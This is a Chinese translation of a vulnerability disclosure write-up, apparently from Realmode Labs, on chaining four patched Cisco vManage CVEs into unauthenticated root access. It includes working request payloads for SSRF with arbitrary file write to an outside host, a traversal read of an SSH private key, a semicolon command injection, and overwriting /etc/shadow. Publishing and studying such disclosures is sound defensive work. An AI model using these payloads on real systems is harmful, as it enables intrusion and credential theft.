SD-PWN — 第3部分 — Cisco vManage — 又一日,又一次网络接管
这是四部分系列中的第三篇文章,前两部分请参阅:
- 第1部分 — Silver Peak Unity Orchestrator
- 第2部分 — Citrix SD-WAN Center
本文继续我们的SD-WAN之旅。如果您尚未阅读第1和第2部分,强烈建议您查看。简而言之,我们在SD-WAN市场的四个主要产品中发现了关键的无认证RCE漏洞,这次我们将讨论Cisco Viptela vManage。
Cisco Viptela vManage
Cisco Viptela vManage是Cisco SD-WAN基础设施的核心,管理网络中的所有不同端点。由于SD-WAN设计的集中化特性,从安全角度来看,vManage是单点故障。
通过串联4个不同的漏洞,我们能够在vManage机器上获得无认证的root权限RCE,这些机器通常托管在公司的云环境中。攻击者无需任何配置的先验知识即可利用这些缺陷。
如果您的组织使用Cisco的Viptela SD-WAN解决方案,请紧急更新设备。最新固件已修复以下所有问题。
技术细节
系统的初始攻击向量是运行在vManage机器443端口上的Web管理服务器。该Web服务器使用JBoss框架运行Java小程序。Web管理接口的无认证攻击面在web.xml文件中列出,明确定义了所有可访问的URL路径。
SSRF + 任意文件写入 — CVE-2020–27128
在查看可能的入口点时,我们注意到了/dataservice入口点。我们不确定代码的确切意图,但我们的假设是不同的端点使用dataservice URL共享数据和统计信息。
/dataservice/statistics/download/dr/filelist处理程序负责下载系统中两台机器之间的统计信息。它接收相邻机器的IP地址和统计文件名并下载以供后续使用。
完全没有进行用户输入验证,导致了多个漏洞。首先,任何IP都可以通过sourcevManageIp参数传递给处理程序,允许进行SSRF攻击。其次,token和fileType参数中的目录遍历允许攻击者将上述数据下载到任何目标路径,甚至可以覆盖现有文件。
服务器以vmanage用户身份运行,允许覆盖一些有趣的文件。
此外,该处理程序没有受到任何CSRF机制的保护。
POST /dataservice/statistics/download/dr/filelist HTTP/1.1
Host: 192.168.100.2:8443
Content-Length: 210
Origin: https://192.168.100.2:8443
Content-Type: application/json{"queue":0, "fileType":"/../../../../../../../tmp/", "deviceIp":"", "sourcevManageIp":"1.2.3.4:12345", "fileList" : [{"file" : "droppeb.bin", "token":"../../../../../../../../../../../"}]}
将导致服务器GET以下路径:
https://1.2.3.4:12345/dataservice/statistics/download/remoteprocessing/file/../../../../../../../dropped.bin
并将文件内容写入:
/opt/data/app-server/statistics/queue-0//../../../../../../../tmp/dropped.bin
尽管这是一个可能被利用来实现RCE的关键漏洞,但它不是最终攻击链的一部分。
未授权文件读取 + 目录遍历 — CVE-2020–26073
在上面的处理程序旁边,我们注意到了另一个有趣的处理程序 — /dataservice/disasterrecovery/download/token/。
它接收一个参数 — 要读取的文件...再次,没有执行用户输入验证,允许轻松利用目录遍历。攻击者能够读取vManage用户可访问的任何文件。
GET /dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fviptela%2F.ssh%2Fid_dsa HTTP/1.1
Host: 192.168.100.2:443
将读取/etc/viptela/.ssh/id_dsa的内容。
SSH密钥
/etc/viptela/.ssh/id_dsa是用于SSH连接的秘密私钥,具有vmanage用户的读取权限。它允许攻击者以vmanage-admin身份通过SSH连接。
vmanage-admin的登录二进制文件是viptela_cli,与admin相同,但vmanage-admin无法访问常规CLI控制台。这是在viptela_cli的主函数中决定的,该函数验证用户名。否则,用户可以通过SSH连接发送单个命令,这提供了一些攻击面。
viptela_cli中的命令注入 — CVE-2020–27129
使用上述SSH密钥登录后,viptela_cli解析用户提供的命令。通过SSH连接发送的任何命令在执行前都会经过验证。
通常只允许以scp -f开头的命令。不幸的是,对命令的其余部分没有执行任何清理,允许攻击者使用分号注入另一个命令。
scp -f -h; touch /tmp/exploit;
上面的命令将以vmanage-admin用户身份运行。
使用busybox.suid进行权限提升 — CVE-2020–26074
在寻找系统中提升权限的不同选项时,我们注意到了一个特殊的suid文件 — busybox.suid。文件系统中的SUID位将在每次执行时将二进制文件的权限提升为root。busybox.suid允许以root身份运行多个busybox小程序。
一个有趣的小程序是tftp,它允许使用tftp协议向系统上传和下载文件。没有对目标路径进行验证,使恶意用户能够以root身份用任何给定数据覆盖任何文件。这使得可以完全控制系统。
一个基本示例是用新的root密码覆盖/etc/shadow文件,然后简单地运行su来获得root访问权限。
完整RCE攻击链
- 使用目录遍历漏洞读取vmanage-admin的私有SSH密钥
- 通过SSH登录并注入将运行权限提升的命令
- 使用
busybox.suid的tftp小程序覆盖/etc/shadow - 运行
su命令获得root命令执行
请注意,这只是利用这些漏洞的一种方式。可能会找到其他可能更简单的攻击链。
时间线
Realmode Labs要感谢Cisco及其PSIRT在报告和修复这些缺陷过程中的出色沟通。
- 2020-07-31 — Realmode Labs向Cisco PSIRT发送初始报告
- 2020-07-31 — Cisco PSIRT确认报告,分配经理
- 2020-11-02 — Cisco PSIRT分配CVE编号,发布修复软件
- 2020-11-04 — 发布公告和CVE
- 2020-11-23 — 本报告发布
请确保在LinkedIn上关注我们或通过contact@realmodelabs.com联系我们,以获取下一个SD-PWN漏洞帖子。
如果您有兴趣对您的某个产品进行安全审计,请联系我们。我们的团队由最高水平的研究人员组成,在发现最难以捉摸的漏洞方面有着良好的记录。
参考资料
-
漏洞1 — SSRF + 任意文件写入 — CVE-2020–27128
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-file-Y2JSRNRb -
漏洞2 — 未授权文件读取 + 目录遍历 — CVE-2020–26073
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vman-traversal-hQh24tmk -
漏洞3 — viptela_cli中的命令注入 — CVE-2020–27129
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-privilege-zPmMf73k -
漏洞4 — 使用busybox.suid进行权限提升 — CVE-2020–26074
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-escalation-Jhqs5Skf
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)
公众号二维码
公众号二维码
